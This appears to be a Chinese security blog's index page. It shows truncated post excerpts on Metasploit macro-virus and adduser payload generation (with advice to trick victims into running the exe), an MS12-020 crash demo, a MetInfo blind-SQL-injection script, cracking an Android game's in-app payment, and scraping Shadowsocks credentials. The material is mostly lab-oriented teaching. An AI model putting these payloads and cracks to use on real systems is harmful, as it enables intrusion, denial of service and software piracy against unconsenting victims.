分享解ROM包技巧

From my:http://www.buildinger.tk/index.php/archives/66/

在刷入Root的Rom包,要小心包内可能夹带的其他推广app(也可能有病毒木马)

那么下面就学习如何解包,查看刷机时到底安装了什么玩意~


一般的刷机包用压缩软件打开后都长成这样,看到最大的文件“system.new.dat”,一般人都会猜到里面就存储着刷入的app了

但是,直接是打不开这个文件的

安卓5.0采用了新的封包模式system被存储在system.new.dat中

我们需要将它转换为“system.img”形式,之后用一般的Rom查看工具就可以...

(●”◡”●)

搁这儿不知道能不能吸粉~

微博→_→http://molok.lofter.com/weibo

Metasploit之宏病毒攻击演示

This is my Blog:http://www.buildinger.tk/index.php/archives/54/

摘要:利用metasploit生成宏病毒代码,放入office文件中;当受害者打开文件时,返回meterpreter会话。
测试环境:

受害机:win10(192.168.8.123)攻击机:kali(192.168.8.131)

攻击演示:
1、生成能反弹会话的宏病毒代码

use windows/meterpreter/reverse_tcpset lhost 192.168.8.131set lport 8899generate -t vba...


几个有趣的Metasploit Payloads

准备搬砖了,还是自己搭博客看着舒服= ̄ω ̄=

http://www.buildinger.tk/index.php/archives/44/

分享几个有趣的Metasploit Payloads

添加管理员用户use windows/adduserset user building

set pass Love@1024

set wmic true //是否提升到管理员权限

show options

generate -t exe -f /root/adduser.exe //输出exe文件

 将adduser.exe利用社工让受害者点击...

安卓逆向之破解水果连连看

工具:AndroidKiller、安卓模拟器(我用的是夜神)

理论基础:Smali基本语法

 第一步:查壳


本次实验对象是无壳无加密的


 第二步:反编译

使用Android Killer打开实验对象


第三步:逻辑梳理

将安装包导入模拟器安装,然后点击“礼包”


未破解的安装包会提示“支付失败”

那么在“工程搜索”中的关键字就是“支付失败”


此时点击搜索会提示无结果,原因是源文件里的汉字是unicode编码的

所以,需要将搜索关键字进行转换


这样就有搜索结果显示出来了


上下大致浏览一遍这个文件的内容

可以发现几条关键语句...


记-Win10+Kali双系统安装问题解决

大概步骤:安装reFind到EFI分区,并用 BOOTICE 来修改启动序列

将reFind移至最前,使用reFind来引导Win10和Kali

随后就是用制作U盘引导工具(我使用的是DEEPIN BOOT MAKER) 将Kali镜像文件ISO写入到U盘中

此时我遇到的问题是,reFind无法引导U盘里的Kali,猜测可能的原因是UEFI的问题

偶然的机会,尝试了以下的方法,将此问题解决了


这是默认用U盘引导制作工具写入到U盘里的文件及文件夹

进入到/boot文件夹里,看见efi.img的文件,将其解压

把此文件里的EFI文件夹复制到U盘根目录即可解决无法引导问题。...

使用kali渗透metasploitable2靶机记录

文章已上传至GitHub:https://github.com/Soulmk/MyGit/blob/master/My_Papers/%E3%80%90%E7%AC%94%E8%AE%B0%E3%80%91kali%E6%B8%97%E9%80%8Fmetasploitable%E9%9D%B6%E6%9C%BA.docx

内容:使用Kali中的Nmap、Hydra、Metasploit 对 Metasploitable2靶机进行渗透,主要以端口渗透的方式进行记录。


Metasploit利用ms12_020蓝屏攻击演示

利用漏洞:MS12-020

官方介绍:http://technet.microsoft.com/en-us/security/bulletin/ms12-020

所需环境:靶机:Windows Server 2003 SP1未打任何补丁——IP地址:192.168.1.11

                 攻击机:Windows 10+Metasploit

演示过程如下:

msf > search ms12_020...

MetInfo5.2.X-5.3.X盲注脚本(二分法)

#coding=utf-8

__author__ = '小亭&KK---http://molok.lofter.com'

import requests

headers = {

'User-Agent': 'Mozilla/5.0 Chrome/28.0.1500.63'

}

keyword = '2013-12-26'#设置判断返回结果差异的关键字,可根据实际情况修改

datalength = 0

host = 'http://127.0.0.1/MetInfov5.2.10'#需要测试...

Python爬取SS账号密码

#!/usr/bin/python

# -*- coding: utf-8 -*-

#__author__ = 'KK——http://molok.lofter.com/'


import re

import requests


url = 'http://www.ishadowsocks.net/'

headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:39.0) Gecko/20100101 Firefox...

1 | 13
© ☯KK | 补丁君 / Powered by LOFTER